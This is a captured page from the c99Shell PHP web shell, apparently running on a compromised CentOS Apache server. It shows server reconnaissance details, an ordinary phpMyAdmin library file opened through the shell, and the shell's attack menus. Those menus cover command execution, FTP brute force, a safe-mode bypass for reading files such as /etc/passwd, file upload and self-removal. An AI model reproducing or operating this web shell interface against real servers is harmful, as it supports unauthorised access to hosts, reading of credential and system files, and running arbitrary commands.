!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_structure.lib.php (5.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 *
 * @package phpMyAdmin
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

// Display function
/**
 * void PMA_TableHeader([bool $db_is_information_schema = false])
 * display table header (<table><thead>...</thead><tbody>)
 *
 * @uses    PMA_showHint()
 * @uses    $GLOBALS['cfg']['PropertiesNumColumns']
 * @uses    $GLOBALS['is_show_stats']
 * @uses    $GLOBALS['colspan_for_structure']
 * @uses    PMA_SortableTableHeader()
 * @param   boolean $db_is_information_schema
 * @param   boolean $replication
 */
function PMA_TableHeader($db_is_information_schema false$replication false)
{
    
$cnt 0// Let's count the columns...

    
if ($db_is_information_schema) {
        
$action_colspan 3;
    } else {
        
$action_colspan 6;
    }

    echo 
'<table class="data">' "\n"
        
.'<thead>' "\n"
        
.'<tr><th></th>' "\n"
        
.'    <th>' PMA_SortableTableHeader(__('Table'), 'table') . '</th>' "\n";
    if (
$replication) {
     echo 
'    <th>' "\n"
         
.'        ' __('Replication') . "\n"
         
.'    </th>';
    }
    echo 
'    <th colspan="' $action_colspan '">' "\n"
        
.'        ' __('Action') . "\n"
        
.'    </th>'
        
// larger values are more interesting so default sort order is DESC
        
.'    <th>' PMA_SortableTableHeader(__('Rows'), 'records''DESC')
        .
PMA_showHint(PMA_sanitize(__('May be approximate. See [a@./Documentation.html#faq3_11@Documentation]FAQ 3.11[/a]'))) . "\n"
        
.'    </th>' "\n";
    if (!(
$GLOBALS['cfg']['PropertiesNumColumns'] > 1)) {
        echo 
'    <th>' PMA_SortableTableHeader(__('Type'), 'type') . '</th>' "\n";
        
$cnt++;
        echo 
'    <th>' PMA_SortableTableHeader(__('Collation'), 'collation') . '</th>' "\n";
        
$cnt++;
    }
    if (
$GLOBALS['is_show_stats']) {
        
// larger values are more interesting so default sort order is DESC
        
echo '    <th>' PMA_SortableTableHeader(__('Size'), 'size''DESC') . '</th>' "\n"
        
// larger values are more interesting so default sort order is DESC
           
'    <th>' PMA_SortableTableHeader(__('Overhead'), 'overhead''DESC') . '</th>' "\n";
        
$cnt += 2;
    }
    echo 
'</tr>' "\n";
    echo 
'</thead>' "\n";
    echo 
'<tbody>' "\n";
    
$GLOBALS['colspan_for_structure'] = $cnt $action_colspan 3;
// end function PMA_TableHeader()


/**
 * Creates a clickable column header for table information
 *
 * @param   string  title to use for the link
 * @param   string  corresponds to sortable data name mapped in libraries/db_info.inc.php  
 * @param   string  initial sort order
 * @returns string  link to be displayed in the table header
 */
function PMA_SortableTableHeader($title$sort$initial_sort_order 'ASC')
{
    
// Set some defaults
    
$requested_sort 'table';
    
$requested_sort_order $future_sort_order $initial_sort_order;
    
    
// If the user requested a sort
    
if (isset($_REQUEST['sort'])) {
        
$requested_sort $_REQUEST['sort'];

        if (isset(
$_REQUEST['sort_order'])) {
            
$requested_sort_order $_REQUEST['sort_order'];
        }
    }

    
$order_img '';
    
$order_link_params = array();
    
$order_link_params['title'] = __('Sort');

    
// If this column was requested to be sorted.
    
if ($requested_sort == $sort) {
        if (
$requested_sort_order == 'ASC') {
            
$future_sort_order 'DESC';
            
// current sort order is ASC
            
$order_img  ' <img class="icon" src="' $GLOBALS['pmaThemeImage'] . 's_asc.png" width="11" height="9" alt="'__('Ascending') . '" title="'__('Ascending') . '" id="sort_arrow" />';
            
// but on mouse over, show the reverse order (DESC)
            
$order_link_params['onmouseover'] = 'if(document.getElementById(\'sort_arrow\')){ document.getElementById(\'sort_arrow\').src=\'' $GLOBALS['pmaThemeImage'] . 's_desc.png\'; }';
            
// on mouse out, show current sort order (ASC)
            
$order_link_params['onmouseout']  = 'if(document.getElementById(\'sort_arrow\')){ document.getElementById(\'sort_arrow\').src=\'' $GLOBALS['pmaThemeImage'] . 's_asc.png\'; }';
        } else {
            
$future_sort_order 'ASC';
            
// current sort order is DESC
            
$order_img  ' <img class="icon" src="' $GLOBALS['pmaThemeImage'] . 's_desc.png" width="11" height="9" alt="'__('Descending') . '" title="'__('Descending') . '" id="sort_arrow" />';
            
// but on mouse over, show the reverse order (ASC)
            
$order_link_params['onmouseover'] = 'if(document.getElementById(\'sort_arrow\')){ document.getElementById(\'sort_arrow\').src=\'' $GLOBALS['pmaThemeImage'] . 's_asc.png\'; }';
            
// on mouse out, show current sort order (DESC)
            
$order_link_params['onmouseout']  = 'if(document.getElementById(\'sort_arrow\')){ document.getElementById(\'sort_arrow\').src=\'' $GLOBALS['pmaThemeImage'] . 's_desc.png\'; }';
        }
    }

    
$_url_params = array(
        
'db' => $_REQUEST['db'],
    );

    
$url 'db_structure.php'.PMA_generate_common_url($_url_params);
    
// We set the position back to 0 every time they sort.
    
$url .= "&amp;pos=0&amp;sort=$sort&amp;sort_order=$future_sort_order";

    return 
PMA_linkOrButton($url$title $order_img$order_link_params);
// end function PMA_SortableTableHeader()
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0187 ]--